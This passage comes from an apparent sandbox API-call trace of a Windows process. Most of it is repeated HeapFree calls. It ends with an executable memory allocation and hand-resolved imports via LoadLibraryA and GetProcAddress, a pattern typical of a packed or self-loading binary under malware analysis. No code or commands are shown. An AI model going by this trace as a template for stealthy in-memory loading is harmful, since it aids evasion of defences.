returned 1 [0086.642] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c76810 | out: hHeap=0x5b0000) returned 1 [0086.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c89a20 | out: hHeap=0x5b0000) returned 1 [0086.828] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2c9cc30 | out: hHeap=0x5b0000) returned 1 [0086.828] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2cafe40 | out: hHeap=0x5b0000) returned 1 [0086.828] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2cc3050 | out: hHeap=0x5b0000) returned 1 [0086.829] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2cd6260 | out: hHeap=0x5b0000) returned 1 [0086.829] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2ce9470 | out: hHeap=0x5b0000) returned 1 [0086.829] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2cfc680 | out: hHeap=0x5b0000) returned 1 [0086.829] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d0f890 | out: hHeap=0x5b0000) returned 1 [0086.833] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d22aa0 | out: hHeap=0x5b0000) returned 1 [0086.833] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d35cb0 | out: hHeap=0x5b0000) returned 1 [0086.833] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d48ec0 | out: hHeap=0x5b0000) returned 1 [0086.833] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d5c0d0 | out: hHeap=0x5b0000) returned 1 [0086.834] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d6f2e0 | out: hHeap=0x5b0000) returned 1 [0086.836] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d824f0 | out: hHeap=0x5b0000) returned 1 [0086.837] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2d95700 | out: hHeap=0x5b0000) returned 1 [0086.837] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2da8910 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2dd0080 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2de3290 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2df64a0 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e096b0 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e1c8c0 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e2fad0 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e42ce0 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e55ef0 | out: hHeap=0x5b0000) returned 1 [0086.838] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e69100 | out: hHeap=0x5b0000) returned 1 [0086.846] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e7c310 | out: hHeap=0x5b0000) returned 1 [0086.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2e8f520 | out: hHeap=0x5b0000) returned 1 [0086.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2ea2730 | out: hHeap=0x5b0000) returned 1 [0086.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2eb5940 | out: hHeap=0x5b0000) returned 1 [0086.848] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2ec8b50 | out: hHeap=0x5b0000) returned 1 [0086.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2edbd60 | out: hHeap=0x5b0000) returned 1 [0086.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2eeef70 | out: hHeap=0x5b0000) returned 1 [0086.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f02180 | out: hHeap=0x5b0000) returned 1 [0086.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f15390 | out: hHeap=0x5b0000) returned 1 [0086.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f285a0 | out: hHeap=0x5b0000) returned 1 [0086.854] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f3b7b0 | out: hHeap=0x5b0000) returned 1 [0086.857] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f4e9c0 | out: hHeap=0x5b0000) returned 1 [0086.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f61bd0 | out: hHeap=0x5b0000) returned 1 [0086.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f74de0 | out: hHeap=0x5b0000) returned 1 [0086.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f87ff0 | out: hHeap=0x5b0000) returned 1 [0086.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2f9b200 | out: hHeap=0x5b0000) returned 1 [0086.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2fae410 | out: hHeap=0x5b0000) returned 1 [0086.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2fc1620 | out: hHeap=0x5b0000) returned 1 [0086.858] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2fd4830 | out: hHeap=0x5b0000) returned 1 [0086.863] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2fe7a40 | out: hHeap=0x5b0000) returned 1 [0086.863] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x2ffac50 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x300de60 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3021070 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3034280 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3047490 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x305a6a0 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x306d8b0 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3080ac0 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3093cd0 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x30a6ee0 | out: hHeap=0x5b0000) returned 1 [0087.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x30ba0f0 | out: hHeap=0x5b0000) returned 1 [0087.021] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x30cd300 | out: hHeap=0x5b0000) returned 1 [0087.024] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x30e0510 | out: hHeap=0x5b0000) returned 1 [0087.026] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x30f3720 | out: hHeap=0x5b0000) returned 1 [0087.026] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3106930 | out: hHeap=0x5b0000) returned 1 [0087.026] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3119b40 | out: hHeap=0x5b0000) returned 1 [0087.026] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x312cd50 | out: hHeap=0x5b0000) returned 1 [0087.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x313ff60 | out: hHeap=0x5b0000) returned 1 [0087.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3153170 | out: hHeap=0x5b0000) returned 1 [0087.027] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3166380 | out: hHeap=0x5b0000) returned 1 [0087.029] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3179590 | out: hHeap=0x5b0000) returned 1 [0087.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x318c7a0 | out: hHeap=0x5b0000) returned 1 [0087.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x319f9b0 | out: hHeap=0x5b0000) returned 1 [0087.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x31b2bc0 | out: hHeap=0x5b0000) returned 1 [0087.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x31c5dd0 | out: hHeap=0x5b0000) returned 1 [0087.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x31d8fe0 | out: hHeap=0x5b0000) returned 1 [0087.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x31ec1f0 | out: hHeap=0x5b0000) returned 1 [0087.081] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x31ff400 | out: hHeap=0x5b0000) returned 1 [0087.081] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3212610 | out: hHeap=0x5b0000) returned 1 [0087.081] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3225820 | out: hHeap=0x5b0000) returned 1 [0087.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3238a30 | out: hHeap=0x5b0000) returned 1 [0087.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x324bc40 | out: hHeap=0x5b0000) returned 1 [0087.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x325ee50 | out: hHeap=0x5b0000) returned 1 [0087.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3272060 | out: hHeap=0x5b0000) returned 1 [0087.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3285270 | out: hHeap=0x5b0000) returned 1 [0087.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3298480 | out: hHeap=0x5b0000) returned 1 [0087.082] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x32ab690 | out: hHeap=0x5b0000) returned 1 [0087.085] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x32be8a0 | out: hHeap=0x5b0000) returned 1 [0087.087] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x32d1ab0 | out: hHeap=0x5b0000) returned 1 [0087.087] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x32e4cc0 | out: hHeap=0x5b0000) returned 1 [0087.087] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x32f7ed0 | out: hHeap=0x5b0000) returned 1 [0087.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x330b0e0 | out: hHeap=0x5b0000) returned 1 [0087.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x331e2f0 | out: hHeap=0x5b0000) returned 1 [0087.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3331500 | out: hHeap=0x5b0000) returned 1 [0087.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3344710 | out: hHeap=0x5b0000) returned 1 [0087.092] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3357920 | out: hHeap=0x5b0000) returned 1 [0087.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x336ab30 | out: hHeap=0x5b0000) returned 1 [0087.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x337dd40 | out: hHeap=0x5b0000) returned 1 [0087.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3390f50 | out: hHeap=0x5b0000) returned 1 [0087.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x33a4160 | out: hHeap=0x5b0000) returned 1 [0087.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x33b7370 | out: hHeap=0x5b0000) returned 1 [0087.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x33ca580 | out: hHeap=0x5b0000) returned 1 [0087.096] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x33dd790 | out: hHeap=0x5b0000) returned 1 [0087.262] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x33f09a0 | out: hHeap=0x5b0000) returned 1 [0087.262] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3403bb0 | out: hHeap=0x5b0000) returned 1 [0087.264] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3416dc0 | out: hHeap=0x5b0000) returned 1 [0087.264] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3429fd0 | out: hHeap=0x5b0000) returned 1 [0087.264] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x343d1e0 | out: hHeap=0x5b0000) returned 1 [0087.264] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x34503f0 | out: hHeap=0x5b0000) returned 1 [0087.266] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3463600 | out: hHeap=0x5b0000) returned 1 [0087.267] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3476810 | out: hHeap=0x5b0000) returned 1 [0087.267] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3489a20 | out: hHeap=0x5b0000) returned 1 [0087.267] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x349cc30 | out: hHeap=0x5b0000) returned 1 [0087.267] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x34afe40 | out: hHeap=0x5b0000) returned 1 [0087.267] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x34c3050 | out: hHeap=0x5b0000) returned 1 [0087.269] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x34d6260 | out: hHeap=0x5b0000) returned 1 [0087.271] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x34e9470 | out: hHeap=0x5b0000) returned 1 [0087.271] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x34fc680 | out: hHeap=0x5b0000) returned 1 [0087.271] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x350f890 | out: hHeap=0x5b0000) returned 1 [0087.274] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3522aa0 | out: hHeap=0x5b0000) returned 1 [0087.274] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3535cb0 | out: hHeap=0x5b0000) returned 1 [0087.274] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3548ec0 | out: hHeap=0x5b0000) returned 1 [0087.275] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x355c0d0 | out: hHeap=0x5b0000) returned 1 [0087.275] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x356f2e0 | out: hHeap=0x5b0000) returned 1 [0087.275] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x35824f0 | out: hHeap=0x5b0000) returned 1 [0087.275] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3595700 | out: hHeap=0x5b0000) returned 1 [0087.277] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x35a8910 | out: hHeap=0x5b0000) returned 1 [0087.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x35bbb20 | out: hHeap=0x5b0000) returned 1 [0087.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x35ced30 | out: hHeap=0x5b0000) returned 1 [0087.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x35e1f40 | out: hHeap=0x5b0000) returned 1 [0087.278] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x35f5150 | out: hHeap=0x5b0000) returned 1 [0087.285] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3608360 | out: hHeap=0x5b0000) returned 1 [0087.288] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x361b570 | out: hHeap=0x5b0000) returned 1 [0087.290] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x362e780 | out: hHeap=0x5b0000) returned 1 [0087.290] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3641990 | out: hHeap=0x5b0000) returned 1 [0087.290] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3654ba0 | out: hHeap=0x5b0000) returned 1 [0087.291] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3667db0 | out: hHeap=0x5b0000) returned 1 [0087.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x367afc0 | out: hHeap=0x5b0000) returned 1 [0087.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x368e1d0 | out: hHeap=0x5b0000) returned 1 [0087.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x36a13e0 | out: hHeap=0x5b0000) returned 1 [0087.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x36b45f0 | out: hHeap=0x5b0000) returned 1 [0087.294] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x36c7800 | out: hHeap=0x5b0000) returned 1 [0087.295] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x36daa10 | out: hHeap=0x5b0000) returned 1 [0087.295] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x36edc20 | out: hHeap=0x5b0000) returned 1 [0087.295] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3700e30 | out: hHeap=0x5b0000) returned 1 [0087.298] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3714040 | out: hHeap=0x5b0000) returned 1 [0087.300] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3727250 | out: hHeap=0x5b0000) returned 1 [0087.475] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x373a460 | out: hHeap=0x5b0000) returned 1 [0087.475] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x374d670 | out: hHeap=0x5b0000) returned 1 [0087.475] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3760880 | out: hHeap=0x5b0000) returned 1 [0087.476] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3773a90 | out: hHeap=0x5b0000) returned 1 [0087.476] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3786ca0 | out: hHeap=0x5b0000) returned 1 [0087.476] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3799eb0 | out: hHeap=0x5b0000) returned 1 [0087.477] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x37ad0c0 | out: hHeap=0x5b0000) returned 1 [0087.479] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x37c02d0 | out: hHeap=0x5b0000) returned 1 [0087.479] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x37d34e0 | out: hHeap=0x5b0000) returned 1 [0087.481] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x37e66f0 | out: hHeap=0x5b0000) returned 1 [0087.483] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x37f9900 | out: hHeap=0x5b0000) returned 1 [0087.483] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x380cb10 | out: hHeap=0x5b0000) returned 1 [0087.486] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x381fd20 | out: hHeap=0x5b0000) returned 1 [0087.490] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3832f30 | out: hHeap=0x5b0000) returned 1 [0087.493] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3846140 | out: hHeap=0x5b0000) returned 1 [0087.493] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3859350 | out: hHeap=0x5b0000) returned 1 [0087.494] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x386c560 | out: hHeap=0x5b0000) returned 1 [0087.494] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x387f770 | out: hHeap=0x5b0000) returned 1 [0087.495] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3892980 | out: hHeap=0x5b0000) returned 1 [0087.496] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x38a5b90 | out: hHeap=0x5b0000) returned 1 [0087.496] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x38b8da0 | out: hHeap=0x5b0000) returned 1 [0087.498] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x38cbfb0 | out: hHeap=0x5b0000) returned 1 [0087.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x38df1c0 | out: hHeap=0x5b0000) returned 1 [0087.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x38f23d0 | out: hHeap=0x5b0000) returned 1 [0087.503] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x39055e0 | out: hHeap=0x5b0000) returned 1 [0087.505] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x39187f0 | out: hHeap=0x5b0000) returned 1 [0087.507] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x392ba00 | out: hHeap=0x5b0000) returned 1 [0087.684] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x393ec10 | out: hHeap=0x5b0000) returned 1 [0087.687] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3951e20 | out: hHeap=0x5b0000) returned 1 [0087.687] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3965030 | out: hHeap=0x5b0000) returned 1 [0087.688] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3978240 | out: hHeap=0x5b0000) returned 1 [0087.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x398b450 | out: hHeap=0x5b0000) returned 1 [0087.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x399e660 | out: hHeap=0x5b0000) returned 1 [0087.691] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x39b1870 | out: hHeap=0x5b0000) returned 1 [0087.691] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x39c4a80 | out: hHeap=0x5b0000) returned 1 [0087.693] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x39d7c90 | out: hHeap=0x5b0000) returned 1 [0087.696] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x39eaea0 | out: hHeap=0x5b0000) returned 1 [0087.698] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x39fe0b0 | out: hHeap=0x5b0000) returned 1 [0087.700] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a112c0 | out: hHeap=0x5b0000) returned 1 [0087.702] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a244d0 | out: hHeap=0x5b0000) returned 1 [0087.708] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a376e0 | out: hHeap=0x5b0000) returned 1 [0087.712] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a4a8f0 | out: hHeap=0x5b0000) returned 1 [0087.717] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a5db00 | out: hHeap=0x5b0000) returned 1 [0087.718] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a70d10 | out: hHeap=0x5b0000) returned 1 [0087.718] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a83f20 | out: hHeap=0x5b0000) returned 1 [0087.978] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a97130 | out: hHeap=0x5b0000) returned 1 [0087.979] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3aaa340 | out: hHeap=0x5b0000) returned 1 [0087.981] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3abd550 | out: hHeap=0x5b0000) returned 1 [0087.983] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3ad0760 | out: hHeap=0x5b0000) returned 1 [0087.986] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3ae3970 | out: hHeap=0x5b0000) returned 1 [0087.989] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fa630 | out: hHeap=0x5b0000) returned 1 [0087.989] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0087.992] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0087.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0087.993] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0087.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0087.995] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0087.995] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0087.995] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0087.995] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0087.995] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0087.995] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0087.995] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0087.995] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0087.995] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0087.995] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0087.995] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0087.995] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0087.995] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ddae0 | out: 